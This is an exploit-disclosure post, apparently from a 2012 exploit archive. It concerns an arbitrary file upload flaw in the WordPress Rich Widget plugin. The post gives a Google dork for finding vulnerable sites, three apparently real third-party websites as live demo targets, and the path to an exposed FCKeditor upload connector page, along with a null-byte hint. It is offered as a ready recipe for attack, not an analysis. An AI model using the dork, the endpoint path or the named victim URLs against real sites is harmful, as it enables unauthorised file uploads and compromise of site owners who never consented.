_________        .__        __________________  \_   ___ \_______|__| _____ 
\_____  \______   \ /    \  \/\_  __ \  |/     \  _(__  <|       _/ \     \____|  
| \/  |  Y Y  \/       \    |   \  \______  /|__|  |__|__|_|  /______  /____|_  
/         \/                \/       \/       \/ 









# Exploit Title: Wordpress Rich Widget Arbitrary File Upload Vulnerability
 
# Google Dork: inurl:wp-content/plugins/rich-widget
 
# Date: 08/22/2012
 
# Author: Crim3R
 
# download Link : http://downloads.wordpress.org/plugin/rich-widget.0.2.4.zip
 
# Tested on: all
 
==================================
  
D3m0:
http://robinveilleux.com/wp-content/plugins/rich-widget/fckeditor/editor/filemanager/connectors/test.html

 
http://www.ctexpos.com/wp-content/plugins/rich-widget/fckeditor/editor/filemanager/connectors/test.html

 
http://www.krystalclear.ca/wp-content/plugins/rich-widget/fckeditor/editor/filemanager/connectors/test.html

 
===============Crim3R@Att.Net=========
 
$Home = %00
 
thanks to :  2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir